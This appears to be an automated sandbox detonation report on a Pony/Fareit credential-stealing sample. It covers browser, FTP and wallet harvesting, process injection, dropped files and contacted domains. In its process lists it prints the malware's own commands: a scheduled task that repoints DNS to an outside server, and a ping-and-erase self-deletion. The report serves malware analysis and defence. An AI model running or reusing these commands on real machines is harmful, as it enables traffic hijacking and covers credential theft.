Analysis Overview
SHA256
fcd7002d101eec1abebb20420e8c88073c12dabf641152c41d92559def4afbd1
Threat Level: Known bad
The file fcd7002d101eec1abebb20420e8c88073c12dabf641152c41d92559def4afbd1 was found to be: Known bad.
Malicious Activity Summary
Pony,Fareit
UPX packed file
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Checks computer location settings
Deletes itself
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious use of SetThreadContext
Drops file in Windows directory
Enumerates physical storage devices
Modifies registry class
Runs ping.exe
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-11-20 06:58
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-11-20 06:58
Reported
2022-11-20 07:01
Platform
win7-20220812-en
Max time kernel
73s
Max time network
58s
Command Line
Signatures
Pony,Fareit
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1660 set thread context of 1664 | N/A | C:\Users\Admin\AppData\Local\Temp\fcd7002d101eec1abebb20420e8c88073c12dabf641152c41d92559def4afbd1.exe | C:\Users\Admin\AppData\Local\Temp\fcd7002d101eec1abebb20420e8c88073c12dabf641152c41d92559def4afbd1.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\calc2.exe | C:\Users\Admin\AppData\Local\Temp\fcd7002d101eec1abebb20420e8c88073c12dabf641152c41d92559def4afbd1.exe | N/A |
Enumerates physical storage devices
Modifies registry class
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fcd7002d101eec1abebb20420e8c88073c12dabf641152c41d92559def4afbd1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fcd7002d101eec1abebb20420e8c88073c12dabf641152c41d92559def4afbd1.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\fcd7002d101eec1abebb20420e8c88073c12dabf641152c41d92559def4afbd1.exe
"C:\Users\Admin\AppData\Local\Temp\fcd7002d101eec1abebb20420e8c88073c12dabf641152c41d92559def4afbd1.exe"
C:\Users\Admin\AppData\Local\Temp\fcd7002d101eec1abebb20420e8c88073c12dabf641152c41d92559def4afbd1.exe
C:\Users\Admin\AppData\Local\Temp\fcd7002d101eec1abebb20420e8c88073c12dabf641152c41d92559def4afbd1.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c at 08:02:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.201", "8.8.8.8")
C:\Windows\SysWOW64\at.exe
at 08:02:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.201", "8.8.8.8")
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping -n 10 localhost && erase "C:\Users\Admin\AppData\Local\Temp\fcd7002d101eec1abebb20420e8c88073c12dabf641152c41d92559def4afbd1.exe"
C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | selaqty.pw | udp |
| N/A | 8.8.8.8:53 | kdotojk.pw | udp |
| N/A | 8.8.8.8:53 | vodiklas.pw | udp |
Files
memory/1660-54-0x0000000075FB1000-0x0000000075FB3000-memory.dmp
memory/1664-55-0x0000000000400000-0x000000000041B000-memory.dmp
memory/1664-56-0x0000000000400000-0x000000000041B000-memory.dmp
memory/1664-58-0x0000000000400000-0x000000000041B000-memory.dmp
memory/1664-59-0x0000000000400000-0x000000000041B000-memory.dmp
memory/1664-60-0x0000000000419C20-mapping.dmp
memory/1660-61-0x0000000000370000-0x0000000000374000-memory.dmp
memory/1664-64-0x0000000000400000-0x000000000041B000-memory.dmp
memory/1664-65-0x0000000000400000-0x000000000041B000-memory.dmp
memory/1664-66-0x0000000000400000-0x000000000041B000-memory.dmp
memory/1772-67-0x0000000000000000-mapping.dmp
memory/1112-68-0x0000000000000000-mapping.dmp
memory/1956-70-0x0000000000000000-mapping.dmp
memory/1664-71-0x0000000000400000-0x000000000041B000-memory.dmp
memory/1792-72-0x0000000000000000-mapping.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-11-20 06:58
Reported
2022-11-20 07:01
Platform
win10v2004-20220812-en
Max time kernel
159s
Max time network
157s
Command Line
Signatures
Pony,Fareit
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\fcd7002d101eec1abebb20420e8c88073c12dabf641152c41d92559def4afbd1.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2688 set thread context of 1168 | N/A | C:\Users\Admin\AppData\Local\Temp\fcd7002d101eec1abebb20420e8c88073c12dabf641152c41d92559def4afbd1.exe | C:\Users\Admin\AppData\Local\Temp\fcd7002d101eec1abebb20420e8c88073c12dabf641152c41d92559def4afbd1.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\calc2.exe | C:\Users\Admin\AppData\Local\Temp\fcd7002d101eec1abebb20420e8c88073c12dabf641152c41d92559def4afbd1.exe | N/A |
Enumerates physical storage devices
Modifies registry class
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fcd7002d101eec1abebb20420e8c88073c12dabf641152c41d92559def4afbd1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fcd7002d101eec1abebb20420e8c88073c12dabf641152c41d92559def4afbd1.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\fcd7002d101eec1abebb20420e8c88073c12dabf641152c41d92559def4afbd1.exe
"C:\Users\Admin\AppData\Local\Temp\fcd7002d101eec1abebb20420e8c88073c12dabf641152c41d92559def4afbd1.exe"
C:\Users\Admin\AppData\Local\Temp\fcd7002d101eec1abebb20420e8c88073c12dabf641152c41d92559def4afbd1.exe
C:\Users\Admin\AppData\Local\Temp\fcd7002d101eec1abebb20420e8c88073c12dabf641152c41d92559def4afbd1.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c at 08:02:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.201", "8.8.8.8")
C:\Windows\SysWOW64\at.exe
at 08:02:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.201", "8.8.8.8")
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping -n 10 localhost && erase "C:\Users\Admin\AppData\Local\Temp\fcd7002d101eec1abebb20420e8c88073c12dabf641152c41d92559def4afbd1.exe"
C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
Network
| Country | Destination | Domain | Proto |
| N/A | 209.197.3.8:80 | tcp | |
| N/A | 8.8.8.8:53 | selaqty.pw | udp |
| N/A | 8.8.8.8:53 | selaqty.pw | udp |
| N/A | 8.8.8.8:53 | selaqty.pw | udp |
| N/A | 8.8.8.8:53 | kdotojk.pw | udp |
| N/A | 8.8.8.8:53 | kdotojk.pw | udp |
| N/A | 8.8.8.8:53 | kdotojk.pw | udp |
| N/A | 8.8.8.8:53 | vodiklas.pw | udp |
| N/A | 52.168.117.170:443 | tcp | |
| N/A | 8.252.51.254:80 | tcp | |
| N/A | 8.253.183.120:80 | tcp | |
| N/A | 104.80.225.205:443 | tcp | |
| N/A | 8.8.8.8:53 | 176.122.125.40.in-addr.arpa | udp |
| N/A | 209.197.3.8:80 | tcp | |
| N/A | 40.126.32.74:443 | tcp |
Files
memory/1168-132-0x0000000000000000-mapping.dmp
memory/1168-133-0x0000000000400000-0x000000000041B000-memory.dmp
memory/2688-135-0x0000000000AC0000-0x0000000000AC4000-memory.dmp
memory/1168-136-0x0000000000400000-0x000000000041B000-memory.dmp
memory/1168-137-0x0000000000400000-0x000000000041B000-memory.dmp
memory/1168-138-0x0000000000400000-0x000000000041B000-memory.dmp
memory/1168-139-0x0000000000400000-0x000000000041B000-memory.dmp
memory/836-140-0x0000000000000000-mapping.dmp
memory/1704-141-0x0000000000000000-mapping.dmp
memory/3068-142-0x0000000000000000-mapping.dmp
memory/1168-143-0x0000000000400000-0x000000000041B000-memory.dmp
memory/260-144-0x0000000000000000-mapping.dmp